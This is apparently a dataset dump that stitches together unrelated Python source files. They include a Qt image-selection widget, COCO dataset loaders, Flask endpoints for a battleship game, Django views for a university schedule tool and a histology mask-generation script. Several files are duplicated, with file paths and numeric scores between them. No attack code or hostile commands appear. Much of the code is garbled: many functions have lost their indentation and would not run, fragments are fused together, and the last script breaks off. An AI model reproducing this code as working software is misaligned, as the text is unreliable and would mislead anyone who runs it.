            Qt QPixmap to be converted

        Returns
        -------
        bytes
            PNG-encoded bytes image
        """
        byte_array = QByteArray()
        buffer = QBuffer(byte_array)
        buffer.open(QIODevice.WriteOnly)
        # serialize through an in-memory Qt buffer in PNG format
        pixmap.save(buffer, 'PNG')
        return byte_array.data()

    @property
    def image_dims(self) -> Tuple[int, int]:
        """Actual image dimensions.

        Returns
        -------
        Tuple[int, int]
            image width and height
        """
        # NOTE(review): these are the *label's* width/height, not the
        # underlying pixmap's -- confirm this is the intended meaning.
        return self.width(), self.height()
class SelectablePixmap(ResizablePixmap):
    """Pixmap whose part can be selected with a selection rubberband.

    Warnings
    --------
    The solution is copied from stackoverflow and is not yet
    properly documented.

    References
    ----------
    https://stackoverflow.com/questions/58053735/get-real-size-of-qpixmap-in-qlabel

    Attributes
    ----------
    currentQRubberBand: Optional[_ResizableRubberBand]
        holds reference to current rubberband
    rubberBandOffset: Optional[QPoint]
        rubberband upper left corner offset from the point where the mouse was
        clicked before dragging start
    moveDirection: Optional[Qt.Orientation]
        direction in which rubberband edge is dragged when resizing
    rubberBandRatio: Optional[float]
        forced aspect ratio of rubberband
    pixmapRect: QRect
        rectangle defining the pixmap borders
    selectionActive: Signal(bool)
        signal emitted whenever a new rubberband selection is created or
        destroyed
    """
    currentQRubberBand: Optional[_ResizableRubberBand]
    rubberBandOffset: Optional[QPoint]
    moveDirection: Optional[Qt.Orientation]
    rubberBandRatio: Optional[float]
    pixmapRect: QRect
    selectionActive: Signal = Signal(bool)

    def __init__(self, bytes_image: bytes) -> None:
        super().__init__(bytes_image)
        # activate mouse tracking to change cursor on rubberband hover
        self.setMouseTracking(True)
        self.currentQRubberBand = None
        self.rubberBandOffset = None
        # 0 means "no edge drag in progress" (despite the Optional annotation)
        self.moveDirection = 0
        self.rubberBandRatio = None

    def set_aspect_ratio(self, ratio: Optional[float]):
        """Sets aspect ratio for rubberband.

        Parameters
        ----------
        ratio: float
            desired aspect ratio; None removes the constraint
        """
        self.rubberBandRatio = ratio
        self._update_ratio()

    def _update_ratio(self):
        """If rubberband is created updates its aspect ratio."""
        if self.currentQRubberBand:
            self.currentQRubberBand.set_aspect_ratio(self.rubberBandRatio)

    def create_selection(self, pos: QPoint):
        """Create new rubberband selection.

        Parameters
        ----------
        pos: QPoint
            clicked position

        Note
        ----
        If an old selection existed, a new one is created only if the mouse
        click happens outside of that selection. Otherwise the current
        selection is moved.
        """
        if self.currentQRubberBand:
            self.cancel_selection()
        self.currentQRubberBand = _ResizableRubberBand(QRubberBand.Rectangle,
                                                       self)
        self.currentQRubberBand.setStyle(QStyleFactory.create("Fusion"))
        # start as a 1x1 rect at the click point; dragging grows it
        self.currentQRubberBand.setGeometry(pos.x(), pos.y(), 1, 1)
        self.currentQRubberBand.show()
        self.originQPoint = pos
        # route the band's Resize/Move events through self.eventFilter
        self.currentQRubberBand.installEventFilter(self)

    def cancel_selection(self):
        """Cancels the current selection and destroys the rubberband."""
        self.currentQRubberBand.hide()
        self.currentQRubberBand.deleteLater()
        self.currentQRubberBand = None
        self.originQPoint = None
        self.selectionActive.emit(False)

    def scale(self, fromResize: bool = False):
        """Handle picture and selection scaling caused by window resize.

        Parameters
        ----------
        fromResize: bool
            tells the type of event that requested scaling
        """
        if fromResize and self.currentQRubberBand:
            # keep data for rubber resizing, before scaling
            oldPixmapRect = self.pixmap().rect()
            oldOrigin = (self.currentQRubberBand.pos() -
                         self.pixmapRect.topLeft())
        super(SelectablePixmap, self).scale()
        # assuming that you always align the image in the center,
        # get the current pixmap rect and move
        # the rectangle center to the current geometry
        self.pixmapRect = self.pixmap().rect()
        self.pixmapRect.moveCenter(self.rect().center())
        if fromResize and self.currentQRubberBand:
            # find the new size ratio based on the previous
            xRatio = self.pixmapRect.width() / oldPixmapRect.width()
            yRatio = self.pixmapRect.height() / oldPixmapRect.height()
            # create a new geometry using 0-rounding for improved accuracy
            # NOTE(review): round(x, 0) yields a float in Python 3 while
            # setGeometry takes ints; also the first argument adds the x
            # offset *after* rounding whereas the second rounds the sum --
            # confirm this works with the Qt binding in use.
            self.currentQRubberBand.setGeometry(
                round(oldOrigin.x() * xRatio, 0) + self.pixmapRect.x(),
                round(oldOrigin.y() * yRatio + self.pixmapRect.y(), 0),
                round(self.currentQRubberBand.width() * xRatio, 0),
                round(self.currentQRubberBand.height() * yRatio, 0))

    def updateMargins(self):
        """Update picture margins for mouse event tracking.

        Whenever the rubberband rectangle geometry changes, create virtual
        rectangles for corners and sides to ease up mouse event checking.
        """
        rect = self.currentQRubberBand.geometry()
        # 8x8 px grab handles at the four corners (normalized so each
        # rect has positive width/height)
        self.rubberTopLeft = QRect(rect.topLeft(),
                                   QSize(8, 8))
        self.rubberTopRight = QRect(rect.topRight(),
                                    QSize(-8, 8)).normalized()
        self.rubberBottomRight = QRect(rect.bottomRight(),
                                       QSize(-8, -8)).normalized()
        self.rubberBottomLeft = QRect(rect.bottomLeft(),
                                      QSize(8, -8)).normalized()
        # edge strips between the corner handles
        self.rubberLeft = QRect(self.rubberTopLeft.bottomLeft(),
                                self.rubberBottomLeft.topRight())
        self.rubberTop = QRect(self.rubberTopLeft.topRight(),
                               self.rubberTopRight.bottomLeft())
        self.rubberRight = QRect(self.rubberTopRight.bottomLeft(),
                                 self.rubberBottomRight.topRight())
        self.rubberBottom = QRect(self.rubberBottomLeft.topRight(),
                                  self.rubberBottomRight.bottomLeft())
        # interior region used for move (drag) detection
        self.rubberInnerRect = QRect(self.rubberTop.bottomLeft(),
                                     self.rubberBottom.topRight())

    def eventFilter(self, source, event: QEvent):
        """Filters GUI events to call special method on resize event.

        Parameters
        ----------
        source
            source that caused the event
        event: QEvent
            type of event

        Returns
        -------
        Callable
            result of the superclass eventFilter
        """
        if event.type() in (QEvent.Resize, QEvent.Move):
            self.updateMargins()
        return super(SelectablePixmap, self).eventFilter(source, event)

    def mousePressEvent(self, event: QEvent):
        """Handles left mouse button clicks.

        If the clicked position is inside the current selection then that
        selection is moved. If it is outside then a new selection is created.
        If the click is in selection margins then the selection is resized by
        dragging one of the edges.

        Parameters
        ----------
        event: QEvent
            calling event

        See also
        --------
        :meth:`SelectablePixmap.updateMargins`
            method responsible for creating margins and keeping them up to date
        """
        pos = event.pos()
        if (not self.currentQRubberBand or
            pos not in self.currentQRubberBand.geometry()):  # noqa E129
            # click outside any selection: start a fresh one (only inside
            # the pixmap area)
            if pos not in self.pixmapRect:
                self.originQPoint = None
                return
            self.create_selection(pos)
            self.selectionActive.emit(True)
            self._update_ratio()
        # corner handles: resize with the opposite corner as fixed origin
        elif pos in self.rubberTopLeft:
            self.originQPoint = (
                self.currentQRubberBand.geometry().bottomRight())
        elif pos in self.rubberTopRight:
            self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
        elif pos in self.rubberBottomRight:
            self.originQPoint = self.currentQRubberBand.geometry().topLeft()
        elif pos in self.rubberBottomLeft:
            self.originQPoint = self.currentQRubberBand.geometry().topRight()
        # edge strips: resize constrained to one axis
        elif pos in self.rubberTop:
            self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
            self.moveDirection = Qt.Vertical
        elif pos in self.rubberBottom:
            self.originQPoint = self.currentQRubberBand.geometry().topLeft()
            self.moveDirection = Qt.Vertical
        elif pos in self.rubberLeft:
            self.originQPoint = self.currentQRubberBand.geometry().topRight()
            self.moveDirection = Qt.Horizontal
        elif pos in self.rubberRight:
            self.originQPoint = self.currentQRubberBand.geometry().topLeft()
            self.moveDirection = Qt.Horizontal
        else:
            # click inside the selection: remember offset for dragging
            self.rubberBandOffset = pos - self.currentQRubberBand.pos()

    def mouseMoveEvent(self, event: QEvent):
        """Handles mouse movement events concerning the rubberband.

        The movement after a mouse button is clicked and held can cause
        two actions. If the click occurred in the margins then the selection
        is resized by dragging the edge. If it is inside the selection
        rectangle then the selection rubberband is moved by dragging.

        Parameters
        ----------
        event: QEvent
            the calling event
        """
        pos = event.pos()
        if event.buttons() == Qt.NoButton and self.currentQRubberBand:
            # hover only: pick a cursor shape matching the region under it
            if pos in self.rubberTopLeft or pos in self.rubberBottomRight:
                self.setCursor(Qt.SizeFDiagCursor)
            elif pos in self.rubberTopRight or pos in self.rubberBottomLeft:
                self.setCursor(Qt.SizeBDiagCursor)
            elif pos in self.rubberLeft or pos in self.rubberRight:
                self.setCursor(Qt.SizeHorCursor)
            elif pos in self.rubberTop or pos in self.rubberBottom:
                self.setCursor(Qt.SizeVerCursor)
            elif pos in self.rubberInnerRect:
                self.setCursor(Qt.SizeAllCursor)
            else:
                self.unsetCursor()
        elif event.buttons():
            if self.rubberBandOffset and self.currentQRubberBand:
                # drag-move: keep the selection fully inside the image
                target = pos - self.rubberBandOffset
                rect = QRect(target, self.currentQRubberBand.size())
                # limit positioning of the selection to the image rectangle
                if rect.x() < self.pixmapRect.x():
                    rect.moveLeft(self.pixmapRect.x())
                elif rect.right() > self.pixmapRect.right():
                    rect.moveRight(self.pixmapRect.right())
                if rect.y() < self.pixmapRect.y():
                    rect.moveTop(self.pixmapRect.y())
                elif rect.bottom() > self.pixmapRect.bottom():
                    rect.moveBottom(self.pixmapRect.bottom())
                self.currentQRubberBand.setGeometry(rect)
            elif self.originQPoint and self.currentQRubberBand:
                if self.moveDirection == Qt.Vertical:
                    # keep the X fixed to the current right, so that only the
                    # vertical position is changed
                    pos.setX(self.currentQRubberBand.geometry().right())
                else:
                    # limit the X to the pixmapRect extent
                    if pos.x() < self.pixmapRect.x():
                        pos.setX(self.pixmapRect.x())
                    elif pos.x() > self.pixmapRect.right():
                        pos.setX(self.pixmapRect.right())
                if self.moveDirection == Qt.Horizontal:
                    # same as before, but for the Y position
                    pos.setY(self.currentQRubberBand.geometry().bottom())
                else:
                    # limit the Y to the pixmapRect extent
                    if pos.y() < self.pixmapRect.y():
                        pos.setY(self.pixmapRect.y())
                    elif pos.y() > self.pixmapRect.bottom():
                        pos.setY(self.pixmapRect.bottom())
                rect = QRect(self.originQPoint, pos)
                self.currentQRubberBand.setGeometry(rect.normalized())

    def mouseReleaseEvent(self, event: QEvent):
        """Handles mouse release events and cleans up the data afterwards.

        Resets: rubberBandOffset, originQPoint, moveDirection
        """
        self.rubberBandOffset = None
        self.originQPoint = None
        self.moveDirection = 0 | 0.929444 | 0.373904
import cv2
import pickle
import random
import numpy as np
def load_images_data(img_ids, images_data):
    """Collect file names and caption lists for the given image ids.

    Parameters:
        img_ids: iterable of keys into images_data
        images_data: mapping id -> {'file_name': str, 'captions': list}

    Returns:
        tuple: (filenames, captions), aligned with img_ids order
    """
    filenames = [images_data[img_id]['file_name'] for img_id in img_ids]
    captions = [images_data[img_id]['captions'] for img_id in img_ids]
    return (filenames, captions)
def load_coco(input_path, split):
""" Load coco dataset """
with open(input_path, 'rb') as file:
coco_raw = pickle.load(file)
images_data_train = coco_raw['images_data_train']
images_data_val = coco_raw['images_data_val']
# split dataset
img_ids = list(images_data_train.keys())
random.shuffle(img_ids)
img_ids_val = list(images_data_val.keys())[:split]
val_split_diff = split - len(img_ids_val)
if val_split_diff > 0:
for img_id in img_ids[:val_split_diff]:
img_ids_val.append(img_id)
images_data_val[img_id] = images_data_train[img_id]
img_ids_test = img_ids[val_split_diff:split + val_split_diff]
img_ids_train = img_ids[split + val_split_diff:]
# load dataset
train_images, train_captions = load_images_data(img_ids_train, images_data_train) # training dataset
val_images, val_captions = load_images_data(img_ids_val, images_data_val) # validation dataset
test_images, test_captions = load_images_data(img_ids_test, images_data_train) # test dataset
return (img_ids_train, train_images, train_captions), (img_ids_val, val_images, val_captions), (img_ids_test, test_images, test_captions)
def load_image(path, size=None, grayscale=False):
    """
    Load the image from the given file-path, optionally resize it, and
    scale pixel values to the range [0.0, 1.0].

    Parameters:
        path: image file path readable by cv2.imread
        size: optional (width, height) passed to cv2.resize
        grayscale: load as single-channel instead of RGB

    Returns:
        np.ndarray: float array in [0, 1]; grayscale images get a trailing
        channel axis so the result is always 3-D.
    """
    # Load the image using opencv
    if not grayscale:  # RGB format (cv2 loads BGR, so convert)
        image = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
    else:  # grayscale format
        image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    # Resize image if desired ("is not None" is the idiomatic test).
    if size is not None:
        image = cv2.resize(image, size)
    # Convert image to numpy array and scale pixels so they fall between 0.0 and 1.0
    image = np.array(image) / 255.0
    # Add 1 extra dimension to grayscale images
    if len(image.shape) == 2:
        image = np.expand_dims(image, axis=-1)
    return image
def print_progress_bar(iteration, total):
    """Print/refresh an in-place 50-character console progress bar.

    Parameters:
        iteration: current step (expected in 0..total)
        total: total number of steps
    """
    percent = ("{0:.1f}").format(100 * (iteration / float(total)))
    filled_length = int(50 * iteration // total)
    bar = '█' * filled_length + '-' * (50 - filled_length)
    # '\r' rewinds the cursor so successive calls overwrite the same line
    print('\rProgress: |%s| %s%% Complete' % (bar, percent), end = '\r')
    # Print New Line on Complete
    if iteration == total:
        # NOTE(review): the text after "print()" below looks like
        # dataset-dump residue fused onto this line -- verify against
        # the original source file.
        print() | dataset/utils.py | import cv2
import pickle
import random
import numpy as np
def load_images_data(img_ids, images_data):
    """Collect file names and caption lists for the given image ids.

    Parameters:
        img_ids: iterable of keys into images_data
        images_data: mapping id -> {'file_name': str, 'captions': list}

    Returns:
        tuple: (filenames, captions), aligned with img_ids order
    """
    filenames = [images_data[img_id]['file_name'] for img_id in img_ids]
    captions = [images_data[img_id]['captions'] for img_id in img_ids]
    return (filenames, captions)
def load_coco(input_path, split):
""" Load coco dataset """
with open(input_path, 'rb') as file:
coco_raw = pickle.load(file)
images_data_train = coco_raw['images_data_train']
images_data_val = coco_raw['images_data_val']
# split dataset
img_ids = list(images_data_train.keys())
random.shuffle(img_ids)
img_ids_val = list(images_data_val.keys())[:split]
val_split_diff = split - len(img_ids_val)
if val_split_diff > 0:
for img_id in img_ids[:val_split_diff]:
img_ids_val.append(img_id)
images_data_val[img_id] = images_data_train[img_id]
img_ids_test = img_ids[val_split_diff:split + val_split_diff]
img_ids_train = img_ids[split + val_split_diff:]
# load dataset
train_images, train_captions = load_images_data(img_ids_train, images_data_train) # training dataset
val_images, val_captions = load_images_data(img_ids_val, images_data_val) # validation dataset
test_images, test_captions = load_images_data(img_ids_test, images_data_train) # test dataset
return (img_ids_train, train_images, train_captions), (img_ids_val, val_images, val_captions), (img_ids_test, test_images, test_captions)
def load_image(path, size=None, grayscale=False):
    """
    Load the image from the given file-path, optionally resize it, and
    scale pixel values to the range [0.0, 1.0].

    Parameters:
        path: image file path readable by cv2.imread
        size: optional (width, height) passed to cv2.resize
        grayscale: load as single-channel instead of RGB

    Returns:
        np.ndarray: float array in [0, 1]; grayscale images get a trailing
        channel axis so the result is always 3-D.
    """
    # Load the image using opencv
    if not grayscale:  # RGB format (cv2 loads BGR, so convert)
        image = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
    else:  # grayscale format
        image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    # Resize image if desired ("is not None" is the idiomatic test).
    if size is not None:
        image = cv2.resize(image, size)
    # Convert image to numpy array and scale pixels so they fall between 0.0 and 1.0
    image = np.array(image) / 255.0
    # Add 1 extra dimension to grayscale images
    if len(image.shape) == 2:
        image = np.expand_dims(image, axis=-1)
    return image
def print_progress_bar(iteration, total):
    """Print/refresh an in-place 50-character console progress bar.

    Parameters:
        iteration: current step (expected in 0..total)
        total: total number of steps
    """
    percent = ("{0:.1f}").format(100 * (iteration / float(total)))
    filled_length = int(50 * iteration // total)
    bar = '█' * filled_length + '-' * (50 - filled_length)
    # '\r' rewinds the cursor so successive calls overwrite the same line
    print('\rProgress: |%s| %s%% Complete' % (bar, percent), end = '\r')
    # Print New Line on Complete
    if iteration == total:
        # NOTE(review): the text after "print()" below looks like
        # dataset-dump residue fused onto this line -- verify against
        # the original source file.
        print() | battleship/game/views.py | from flask import Blueprint, jsonify, request
from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from battleship import db
from battleship.helpers import OK_REQUEST, BAD_REQUEST, CREATED, \
UNAUTHORIZED, \
add_then_commit
from battleship.models import Account, Coords, Game
# Create new flask blueprint
game = Blueprint('game', __name__)
@game.route('/game', methods=['POST'])
@cross_origin()
def create_game():
    """ Get or Create Account & Create New Game.

    Returns:
        dict: JSON Success or Error response.
    """
    # Guard: a user_name is mandatory in the JSON payload.
    if 'user_name' not in request.json:
        return jsonify({'success': False}), BAD_REQUEST
    # Look up (or lazily create) the account, then attach a fresh game.
    account = Account.get_or_create(request.json['user_name'])
    new_game = Game()
    account.games.append(new_game)
    add_then_commit(account)
    return jsonify({'success': True, 'game_id': new_game.id}), CREATED
@game.route('/game/<id>', methods=['DELETE'])
@cross_origin()
def delete_game(id):
    """ Delete game.

    Returns:
        dict: JSON Success or Error response.
    """
    # Guard: deleting an unknown game id is a client error.
    target = Game.query.filter_by(id=id).first()
    if target is None:
        return jsonify({'success': False}), BAD_REQUEST
    Game.query.filter_by(id=id).delete()
    db.session.commit()
    return jsonify({'success': True}), OK_REQUEST
@game.route('/game/<id>/coords', methods=['PUT'])
@cross_origin()
def game_coords(id):
    """ Add user or cpu coordinates to a game.

    Returns:
        dict: JSON Success or Error response.
    """
    if 'user_name' not in request.json:
        return jsonify({'success': False}), BAD_REQUEST
    # Re-assign request object.
    req = request.json
    # Gather Account & Game related info.
    account = Account.get_or_create(req['user_name'])
    this_game = Game.query.filter_by(id=id).first()
    # Robustness fix: an unknown game id previously raised AttributeError
    # (HTTP 500) on the ownership check below; report it as a bad request.
    if this_game is None:
        return jsonify({'success': False}), BAD_REQUEST
    # Verify request is genuine.
    if this_game.account.id != account.id:
        return jsonify({'success': False}), UNAUTHORIZED
    # Get or create coordinates for this unique game and record the move.
    coords = Coords.get_or_create(this_game)
    coords.add_coords(req['player'], req['coords'])
    # Save new data.
    add_then_commit(coords)
    return jsonify({'success': True}), CREATED
@game.route('/game/<id>/won', methods=['PUT'])
@cross_origin()
def game_results(id):
""" Update game results.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.get_json()
# Gather Account & Game related info.
account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
this_game.won = True
# Save new data.
add_then_commit(this_game)
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST | battleship/game/views.py | from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from battleship import db
from battleship.helpers import OK_REQUEST, BAD_REQUEST, CREATED, \
UNAUTHORIZED, \
add_then_commit
from battleship.models import Account, Coords, Game
# Create new flask blueprint
game = Blueprint('game', __name__)
@game.route('/game', methods=['POST'])
@cross_origin()
def create_game():
""" Get or Create Account & Create New Game.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Create or get account & create game.
account = Account.get_or_create(request.json['user_name'])
new_game = Game()
# Create relationship & save.
account.games.append(new_game)
add_then_commit(account)
return jsonify({'success': True, 'game_id': new_game.id}), CREATED
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>', methods=['DELETE'])
@cross_origin()
def delete_game(id):
""" Delete game.
Returns:
dict: JSON Success or Error response.
"""
this_game = Game.query.filter_by(id=id).first()
if this_game is not None:
Game.query.filter_by(id=id).delete()
db.session.commit()
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>/coords', methods=['PUT'])
@cross_origin()
def game_coords(id):
""" Add user or cpu coordinates to new game.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.json
# Gather Account & Game related info.
account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
coords = Coords.get_or_create(this_game)
coords.add_coords(req['player'], req['coords'])
# Save new data.
add_then_commit(coords)
return jsonify({'success': True}), CREATED
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>/won', methods=['PUT'])
@cross_origin()
def game_results(id):
""" Update game results.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.get_json()
# Gather Account & Game related info.
account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
this_game.won = True
# Save new data.
add_then_commit(this_game)
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST | 0.377082 | 0.077274 |
from django.shortcuts import render
from django.views.generic.list import ListView
from mainApp.models import Faculty
import teachers, rooms, lesson
def index(request):
return render(request, 'mainApp/index.html')
def instruments(request):
instruemnts_name = request.GET.get('name') or []
facultys = Faculty.objects.all()
items = []
for _ in instruemnts_name.split(','):
items.append(_)
if not items:
items.append("Не переданны имена инструментов")
global put
put = request.get_full_path()
put = put.replace('/instruments/?name=','')
return render(request, 'mainApp/parameters.html', {'values': items, 'name': facultys})
def test(request):
faculty = request.POST.get('post_faculty')
group = request.POST.get('post_group')
discipline = request.POST.get('post_discipline')
name_teacher = request.POST.get('post_name_teacher')
date_week = request.POST.get('post_date_week')
audience = request.POST.get('post_audience')
adress = request.POST.get('post_adress')
date_range = request.POST.get('post_date_range')
date_start = request.POST.get('post_date_start')
if put == '1-1':
items = rooms.tool_1_1()
elif put == '1-2':
items = rooms.tool_1_2()
elif put == '1-3':
tool = adress + ', ' + audience
items = rooms.tool_1_3(tool)
elif put == '2-1':
items = teachers.tool_2_1_1(faculty, group)
elif put == '2-2':
items = teachers.tool_2_1_2(faculty, discipline)
elif put == '2-3':
items = teachers.tool_2_2_1(faculty, group)
elif put == '2-4':
items = teachers.tool_2_2_2(faculty, discipline)
elif put == '2-5':
items = teachers.tool_2_3(faculty,name_teacher,date_week)
elif put == '3-1':
items = lesson.tool_3_1(faculty,group,date_week)
elif put == '3-2':
items = lesson.tool_3_2(faculty, group, discipline)
elif put == '3-3':
items = lesson.tool_3_3(faculty, group, date_week)
elif put == '3-4':
items = lesson.tool_3_4(faculty, group, discipline)
elif put == '3-5':
items = lesson.tool_3_5(faculty, date_week)
return render(request, 'mainApp/test.html',{'photo': items,'tt': discipline, 'dd': group,'oo': put}) | mainApp/views.py | from django.shortcuts import render
from django.views.generic.list import ListView
from mainApp.models import Faculty
import teachers, rooms, lesson
def index(request):
return render(request, 'mainApp/index.html')
def instruments(request):
instruemnts_name = request.GET.get('name') or []
facultys = Faculty.objects.all()
items = []
for _ in instruemnts_name.split(','):
items.append(_)
if not items:
items.append("Не переданны имена инструментов")
global put
put = request.get_full_path()
put = put.replace('/instruments/?name=','')
return render(request, 'mainApp/parameters.html', {'values': items, 'name': facultys})
def test(request):
faculty = request.POST.get('post_faculty')
group = request.POST.get('post_group')
discipline = request.POST.get('post_discipline')
name_teacher = request.POST.get('post_name_teacher')
date_week = request.POST.get('post_date_week')
audience = request.POST.get('post_audience')
adress = request.POST.get('post_adress')
date_range = request.POST.get('post_date_range')
date_start = request.POST.get('post_date_start')
if put == '1-1':
items = rooms.tool_1_1()
elif put == '1-2':
items = rooms.tool_1_2()
elif put == '1-3':
tool = adress + ', ' + audience
items = rooms.tool_1_3(tool)
elif put == '2-1':
items = teachers.tool_2_1_1(faculty, group)
elif put == '2-2':
items = teachers.tool_2_1_2(faculty, discipline)
elif put == '2-3':
items = teachers.tool_2_2_1(faculty, group)
elif put == '2-4':
items = teachers.tool_2_2_2(faculty, discipline)
elif put == '2-5':
items = teachers.tool_2_3(faculty,name_teacher,date_week)
elif put == '3-1':
items = lesson.tool_3_1(faculty,group,date_week)
elif put == '3-2':
items = lesson.tool_3_2(faculty, group, discipline)
elif put == '3-3':
items = lesson.tool_3_3(faculty, group, date_week)
elif put == '3-4':
items = lesson.tool_3_4(faculty, group, discipline)
elif put == '3-5':
items = lesson.tool_3_5(faculty, date_week)
return render(request, 'mainApp/test.html',{'photo': items,'tt': discipline, 'dd': group,'oo': put}) | 0.254972 | 0.140189 |
import numpy as np
import matplotlib
import os
import glob
from tensorflow.keras.preprocessing import image
import PIL
import matplotlib.pyplot as plt
PIL.Image.MAX_IMAGE_PIXELS = 933120000
masks_folder = "F:/Datasets/DigestPath/masks"
images_folder = "F:/Datasets/DigestPath/images"
outfolder = "F:/Datasets/DigestPath/tri_masks_3diffcolors_new"
outfolder_images = "F:/Datasets/DigestPath/images_new"
masks_paths = glob.glob(os.path.join(masks_folder,"*.png"))
if not os.path.exists(outfolder):
os.makedirs(outfolder)
if not os.path.exists(outfolder_images):
os.makedirs(outfolder_images)
def extract_image(mask_path):
mask_name = os.path.split(mask_path)[1]
mask_name = mask_name.split(".")[0]+".png"
img_name = mask_name.split(".")[0]+".jpg"
img_path = os.path.join(images_folder,img_name)
mask = image.load_img(mask_path)
img = image.load_img(img_path)
mask_np = image.img_to_array(mask)
image_np = image.img_to_array(img)
if mask_np.shape[2] == 4:
mask_np = mask_np[:,:,:3]
if image_np.shape[2] == 4:
image_np = image_np[:,:,:3]
mask_axis_max = np.max(mask_np,axis=2)
mask_np[:, :, 0] = mask_axis_max
mask_np[:, :, 1] = mask_axis_max
mask_np[:, :, 2] = mask_axis_max
mask_np[mask_np < 100] = 0 #tissue + white portion
mask_np[mask_np >= 100] = 2 #glands
image_axis_min = np.mean(image_np, axis=2)
image_np[:, :, 0] = image_axis_min
image_np[:, :, 1] = image_axis_min
image_np[:, :, 2] = image_axis_min
image_np[image_np >= 230] = 255 #white portion -> 1 tissue (after inversion)
image_np[image_np < 230] = 0 #tissue -> 0 white portion (after inversion)
image_np=image_np/255
image_np = 1 - image_np
new_mk = mask_np+image_np
new_mk[:, :, 0][new_mk[:, :, 0]==0] = 0 #white background : Blue color
new_mk[:, :, 1][new_mk[:, :, 1]==0] = 0 #white background : Blue color
new_mk[:, :, 2][new_mk[:, :, 2]==0] = 255 #white background : Blue color
new_mk[:, :, 0][new_mk[:, :, 0] == 1] = 255 # tissue region : Red color
new_mk[:, :, 1][new_mk[:, :, 1] == 1] = 0 # tissue region : Red color
new_mk[:, :, 2][new_mk[:, :, 2] == 1] = 0 # tissue region : Red color
new_mk[:, :, 0][new_mk[:, :, 0] == 2] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 2] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 2] = 0 # Glands : Green color
new_mk[:, :, 0][new_mk[:, :, 0] == 3] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 3] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 3] = 0 # Glands : Green color
#new_mk = new_mk/255.0
#plt.imshow(new_mk)
#plt.show()
print(mask_name)
image.save_img(os.path.join(outfolder,mask_name),new_mk)
#image.save_img(os.path.join(outfolder_images,img_name),img)
for path in masks_paths:
if("neg" in path):
print(path)
extract_image(path) | DigestPath/collect_masks_optimized.py | import numpy as np
import matplotlib
import os
import glob
from tensorflow.keras.preprocessing import image
import PIL
import matplotlib.pyplot as plt
PIL.Image.MAX_IMAGE_PIXELS = 933120000
masks_folder = "F:/Datasets/DigestPath/masks"
images_folder = "F:/Datasets/DigestPath/images"
outfolder = "F:/Datasets/DigestPath/tri_masks_3diffcolors_new"
outfolder_images = "F:/Datasets/DigestPath/images_new"
masks_paths = glob.glob(os.path.join(masks_folder,"*.png"))
if not os.path.exists(outfolder):
os.makedirs(outfolder)
if not os.path.exists(outfolder_images):
os.makedirs(outfolder_images)
def extract_image(mask_path):
mask_name = os.path.split(mask_path)[1]
mask_name = mask_name.split(".")[0]+".png"
img_name = mask_name.split(".")[0]+".jpg"
img_path = os.path.join(images_folder,img_name)
mask = image.load_img(mask_path)
img = image.load_img(img_path)
mask_np = image.img_to_array(mask)
image_np = image.img_to_array(img)
if mask_np.shape[2] == 4:
mask_np = mask_np[:,:,:3]
if image_np.shape[2] == 4:
image_np = image_np[:,:,:3]
mask_axis_max = np.max(mask_np,axis=2)
mask_np[:, :, 0] = mask_axis_max
mask_np[:, :, 1] = mask_axis_max
mask_np[:, :, 2] = mask_axis_max
mask_np[mask_np < 100] = 0 #tissue + white portion
mask_np[mask_np >= 100] = 2 #glands
image_axis_min = np.mean(image_np, axis=2)
image_np[:, :, 0] = image_axis_min
image_np[:, :, 1] = image_axis_min
image_np[:, :, 2] = image_axis_min
image_np[image_np >= 230] = 255 #white portion -> 1 tissue (after inversion)
image_np[image_np < 230] = 0 #tissue -> 0 white portion (after inversion)
image_np=image_np/255
image_np = 1 - image_np
new_mk = mask_np+image_np
new_mk[:, :, 0][new_mk[:, :, 0]==0] = 0 #white background : Blue color
new_mk[:, :, 1][new_mk[:, :, 1]==0] = 0 #white background : Blue color
new_mk[:, :, 2][new_mk[:, :, 2]==0] = 255 #white background : Blue color
new_mk[:, :, 0][new_mk[:, :, 0] == 1] = 255 # tissue region : Red color
new_mk[:, :, 1][new_mk[:, :, 1] == 1] = 0 # tissue region : Red color
new_mk[:, :, 2][new_mk[:, :, 2] == 1] = 0 # tissue region : Red color
new_mk[:, :, 0][new_mk[:, :, 0] == 2] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 2] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 2] = 0 # Glands : Green color
new_mk[:, :, 0][new_mk[:, :, 0] == 3] = 0 # Glands : Green color
